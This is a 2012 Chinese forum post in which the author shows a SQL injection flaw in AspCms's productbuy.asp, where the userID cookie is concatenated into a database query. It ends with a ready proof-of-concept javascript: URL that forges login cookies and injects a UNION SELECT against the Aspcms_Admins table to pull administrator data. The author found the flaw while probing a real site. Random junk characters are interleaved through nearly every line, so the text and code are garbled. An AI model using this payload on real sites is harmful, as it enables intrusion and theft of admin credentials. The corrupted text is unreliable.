好久没上土司了,上来一看发现在删号名单内.....
' Y+ a- i) u7 |也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。/ e q* ^. ^+ C
废话不多说,看代码:
% N1 _: ]& @2 q' I# M. a7 P) w" b
1 J$ i' B9 N6 U5 ~<%( l' S) W- p3 W! n6 i7 `& R
# ]; U" n% M0 j# E% W P
if action = "buy" then9 n% L3 i' b w8 O
4 }/ K/ q9 ~8 h4 t7 @5 @8 P addOrder()
. f. _0 {) m$ S. \% A
, Z; l/ y* ]0 K+ }* M+ oelse
% h& \) J S9 X1 S' m/ k8 x6 D$ A2 [- X" V' p! [+ l/ }2 y4 ~
echoContent()
4 d" H+ L# o1 h* l- x y" g! H+ h% A
end if
) l2 A$ d4 }( M% [/ Y b @' y; Z! k* l1 n, \: r5 i8 X
: I2 _# @: b1 W) [5 [
: g6 ^2 @7 `4 O, X1 @6 x
……略过% w' B" {0 \3 V2 w
# y0 a: K9 n! I$ |
! q7 n% A# I) ]/ G1 |2 d$ Z; n) n% n) f, O9 F: `# P2 k. y- j
Sub echoContent()8 i; q: o. W. S: y2 L# @
( u# S/ I) ~* @3 U" M dim id3 a* x4 ?$ [% e3 k( r/ M$ r
2 }7 y2 D4 P) F+ l% @* Z" m id=getForm("id","get")
) t W I0 t; j+ z* f' k; J% H Q* p' I, [) D- @: g& l
5 `* m8 r( C) g( g
/ U2 r, V$ R/ {: [ if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
0 ?' k8 ?0 o1 f4 ], p' L2 I" d) s! z, ?
3 M0 X) m7 \7 m. I$ I6 G# v7 g/ o, _- k! N; D# m% Y
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
- |9 w% X( \/ O2 k% c8 t+ V2 b& s2 B
/ }* b: \( Z3 K, }. h* q dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct5 f# d) ]% w$ {+ M. R
6 q- @7 d5 e% k& Y! U- U
Dim templatePath,tempStr1 W- b& l6 Y% F& v) }( h
3 f3 i& p& C/ C- R" A. b
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
6 i2 w$ [* G! \5 k* n$ ~+ \3 Q ~- h7 q# I* G, U+ ?
. V- D3 |1 @% T% m9 z" M, d n/ P- m0 ~5 f d
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")8 a; F- G& R4 ~0 a6 G" Y& O+ x3 O( R
/ F0 W4 d v: C6 q7 ?: u
selectproduct=rsObj(0)
9 `4 b4 g- j. D; W3 L: r2 O9 E3 @# F) S! U) a0 i: w
1 h" n/ v$ M7 Q! n$ v% N7 D! @2 v$ p1 t0 R# N/ `
Dim linkman,gender,phone,mobile,email,qq,address,postcode
! I3 C4 C$ ?: m% X+ c" C# R; Q Q5 w$ I' a! X3 H
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
4 q; Q! K2 t+ ^% h" a9 L
- |7 r2 m0 u$ y ]* F% e if rCookie("loginstatus")=1 then
7 r3 o4 Y& @. t% A8 a7 C5 \
/ G4 x: P4 h* {3 m( }# L set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
1 o% U# W% D. V: O+ i8 G0 S- R& L
linkman=rsObj("truename")
/ E8 t- P" r9 x6 a* i) y/ r. i) k8 T# V! }
gender=rsObj("gender")9 Z7 c3 x( u9 w1 q4 E
) q0 @ Z+ A5 Y$ g8 p
phone=rsObj("phone"); v% m) N- v" k0 r1 o8 O3 @
% l/ S2 L) p0 w! I# t' U mobile=rsObj("mobile")
- o. r6 o$ o2 X3 T/ b
( K3 t2 f; Q2 o/ ?. A1 {) i# J email=rsObj("email")
: h9 u& O* c# u/ _3 J5 Y% D! V& V$ d- L& j5 N: _1 G3 k1 ^" [" N
qq=rsObj("qq")
( u0 C: c% S' z
" ~# n/ s' e& K9 R3 r0 { address=rsObj("address")
% V e$ J, v {) O( @; O$ C, j' C Y( P1 }; n* n) p
postcode=rsObj("postcode")
- [# [4 n- Z/ T4 J @& v
% @5 I4 P! a/ I$ O9 S. Y3 V1 }, Y- \9 } else , a% n! V3 ]! |4 k* p
5 l$ B3 X0 ~: s7 s
gender=1
6 c- }9 c# d4 x+ t6 u, S9 C9 t1 c( R# b
end if! Z: O) w7 ]* `
( r& x v" E' I2 Z% r* m1 r rsObj.close()
. \7 Z9 T+ t6 o' B/ I' ^9 Z( c, j: Q9 `- k
1 Q1 \' }; f( Y7 t
' R! d/ Q4 B$ }) j( ^! M' X D K$ h4 L; b3 H$ s
with templateObj ( I& d9 r/ G3 | x0 V; d
7 W' V6 C" o5 [" [8 H* Q& R/ x
.content=loadFile(templatePath) 2 d( Q" K2 l( c% J* X' K' r5 M7 X
! J p3 f) I; Z+ m% E( O K
.parseHtml()
7 T3 d2 h$ s; A8 C( t" K& M
' j" a. [2 }" `$ U8 u .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)1 ]/ S# V# [' G. [" P* s
6 I+ S. z' V0 I+ e .content=replaceStr(.content,"[aspcms:linkman]",linkman)
4 H* l- |; g( s4 o( {
; i1 t# m% @3 X7 H1 u .content=replaceStr(.content,"[aspcms:gender]",gender) ( F* x* H7 `3 c1 g2 J' ]/ m
" w' z: v/ K( N$ P) q7 k8 ]9 |* @ .content=replaceStr(.content,"[aspcms:phone]",phone) & N1 C$ q) `& H4 x% @2 M9 l
4 }+ p0 f& s/ W* Y0 I
.content=replaceStr(.content,"[aspcms:mobile]",mobile) + w4 \- Q3 f! f8 G6 c7 k
8 f2 ~* |: Z! o& @) n, X( Y' a: G
.content=replaceStr(.content,"[aspcms:email]",email) ; }% {4 X+ a# u l) c
6 m7 Q* g7 t: y6 f+ `" V; h; u3 P .content=replaceStr(.content,"[aspcms:qq]",qq)
5 V, }' Y9 S0 s( a: |, S" g
& k1 o/ |% M4 K, k8 J4 O .content=replaceStr(.content,"[aspcms:address]",address) ( o9 S2 V8 g( [+ W
$ _* K( q: u- [& }0 h5 s# M2 ` .content=replaceStr(.content,"[aspcms:postcode]",postcode)
, {( {1 g+ n' U2 v/ H9 J- v, F5 e3 m/ X$ ?% x D U# ?
.parseCommon() 2 r+ D/ f: @0 r' Y( J1 ~( P2 d
( n+ U1 ~# e1 V3 H echo .content
7 K: V, s1 n: Z7 F) G' e, }0 V3 B& B
$ I$ ]0 p4 `2 x& t2 j- x) W end with+ E) ^& L3 C: F
% Y" s4 v7 I, T! l" p
set templateobj =nothing : terminateAllObjects1 p. O& T" |+ m& B
' k7 I! X0 b5 A9 V$ v' m4 ]: kEnd Sub) x# N8 }* |( _* _; ?
漏洞很明显,没啥好说的# e5 V7 ], o* d
poc:' q% Q( Y3 k) q1 B& k
7 ?8 b5 `0 n5 G$ {javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子8 j' q6 `$ {2 q4 }+ h. ?3 g" h
8 D" N8 f% L6 b3 ~: \ |
发表于 2012-12-27 08:35:05
收藏
支持
反对